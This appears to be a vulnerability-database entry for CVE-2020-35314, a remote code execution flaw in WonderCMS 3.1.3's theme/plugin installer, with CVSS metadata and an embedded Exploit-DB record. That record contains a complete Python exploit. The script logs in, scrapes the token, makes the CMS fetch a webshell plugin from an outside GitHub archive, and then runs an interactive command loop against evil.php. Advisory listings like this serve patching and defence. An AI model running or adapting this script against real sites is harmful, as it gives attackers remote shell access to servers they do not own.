Description
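A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3 allows remote attackers to upload a custom plugin, which can contain arbitrary code, and obtain a webshell via the theme/plugin installer. Note that the exploit references attached to this record title the issue "Authenticated Remote Code Execution" and state that an attacker must have a valid authenticated session on the CMS, whereas the CVSS vectors in the record list no authentication or privileges as required (Au:N, PR:N); that difference matters when prioritizing the 9.8 base score.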
Affected Software
Related
{"id": "CVE-2020-35314", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-35314", "description": "A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.", "published": "2021-04-20T20:15:00", "modified": "2021-06-01T20:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35314", "reporter": "cve@mitre.org", "references": ["https://github.com/robiso/wondercms", "https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution"], "cvelist": ["CVE-2020-35314"], "immutableFields": [], "lastseen": "2022-03-23T17:48:25", "viewCount": 31, "enchantments": {"dependencies": 
{"references": [{"type": "exploitdb", "idList": ["EDB-ID:49155"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160311"]}], "rev": 4}, "score": {"value": 8.0, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-28T11:39:26", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1399833246712610824", "text": " NEW: CVE-2020-35314 A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbi... (click for more) Severity: CRITICAL https://t.co/IYWtlkWuVi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1399833246712610824", "text": " NEW: CVE-2020-35314 A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbi... (click for more) Severity: CRITICAL https://t.co/IYWtlkWuVi?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49155"]}]}, "exploitation": null, "vulnersScore": 8.0}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:wondercms:wondercms:3.1.3"], "cpe23": ["cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "wondercms:wondercms", "version": "3.1.3", "operator": "eq", "name": "wondercms"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/robiso/wondercms", "name": "https://github.com/robiso/wondercms", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "name": 
"https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "name": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution", "name": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"exploitdb": [{"lastseen": "2022-05-13T17:42:26", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "exploitdb", "title": "WonderCMS 3.1.3 - Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-35314", "CVE-2020-35314"], "modified": "2020-12-02T00:00:00", "id": "EDB-ID:49155", "href": "https://www.exploit-db.com/exploits/49155", "sourceData": "# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution\r\n# Date: 2020-11-27\r\n# Exploit Author: zetc0de\r\n# Vendor Homepage: https://www.wondercms.com/\r\n# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip\r\n# Version: 3.1.3\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-35314\r\n\r\n\r\n# WonderCMS is vulnerable to Authenticated Remote Code Execution.\r\n# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.\r\n# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.\r\n\r\n# python3 exploit.py 
http://wonder.com/loginURL GpIyq0RH \r\n# -------------\r\n# [+] Getting Token\r\n# [+] Sending Payload\r\n# [+] Get the shell\r\n# [+] Enjoy!\r\n# $id\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\n\r\n\r\nprint(colored('''\r\n\r\n\\ \\ /_ \\ \\ | _ \\ __| _ \\ __| \\ | __| \r\n \\ \\ \\ /( |. | | |_| / ( |\\/ |\\__ \\ \r\n \\_/\\_/\\___/_|\\_|___/___|_|_\\\\___|_| _|____/ \r\n \r\n------[ Auth Remote Code Execution ]------\r\n\t''',\"blue\"))\r\n\r\nif len(sys.argv) != 3:\r\n print(colored(\"[-] Usage : ./wonder.py loginURL password\",\"red\"))\r\n exit()\r\n\r\nloginURL = sys.argv[1]\r\npassword = sys.argv[2]\r\n\r\nr = requests.session()\r\ndata = { \"password\" : password }\r\npage = r.post(loginURL,data)\r\nif \"Wrong\" in page.text:\r\n\tprint(colored(\"[!] Exploit Failed : Wrong Credential\",\"red\"))\r\n\texit()\r\n\r\nprint(colored(\"[+] Getting Token\",\"blue\"))\r\nsoup = BeautifulSoup(page.text, \"html.parser\")\r\n\r\nallscript = soup.find_all(\"script\")\r\nno = 0\r\nfor i in allscript:\r\n\tif \"rootURL\" in str(i):\r\n\t\turl = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\telif \"token\" in str(i):\r\n\t\ttoken = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\r\npayload = \"https://github.com/zetc0de/wonderplugin/archive/master.zip\"\r\n\r\ndef sendPayload(req,url,payload,token):\r\n\tgetShell = url + \"?installThemePlugin=\" + payload + \"&type=plugins&token=\" + token\r\n\treq.get(getShell)\r\n\tshell = url + \"plugins/wonderplugin/evil.php\"\r\n\tcheckshell = req.get(shell)\r\n\tif \"1337\" in checkshell.text:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\nprint(colored(\"[+] Sending Payload\",\"blue\"))\r\nshell = sendPayload(r,url,payload,token)\r\n\r\n\r\nif shell == True:\r\n\tprint(colored(\"[+] Get the shell\",\"blue\"))\r\n\tprint(colored(\"[+] 
Enjoy!\",\"blue\"))\r\n\tshell = url + \"plugins/wonderplugin/evil.php\"\r\n\twhile True:\r\n\t\tcmd = input(\"$\")\r\n\t\tdata = { \"cmd\" : cmd }\r\n\r\n\t\tres = r.post(shell,data)\r\n\t\tif res.status_code == 200:\r\n\t\t\tprint(res.text)\r\nelif shell == False:\r\n\tprint(colored(\"[+] Get the shell\",\"blue\"))\r\n\tprint(colored(\"[+] Enjoy!\",\"blue\"))\r\n\tshell = url + \"plugins/wonderplugin-master/evil.php\"\r\n\twhile True:\r\n\t\tcmd = input(\"$\")\r\n\t\tdata = { \"cmd\" : cmd }\r\n\t\tres = r.post(shell,data)\r\n\t\tif res.status_code == 200:\r\n\t\t\tprint(res.text)\r\nelse:\r\n\tprint(colored(\"[!] Failed to exploit\",\"red\"))", "sourceHref": "https://www.exploit-db.com/download/49155", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}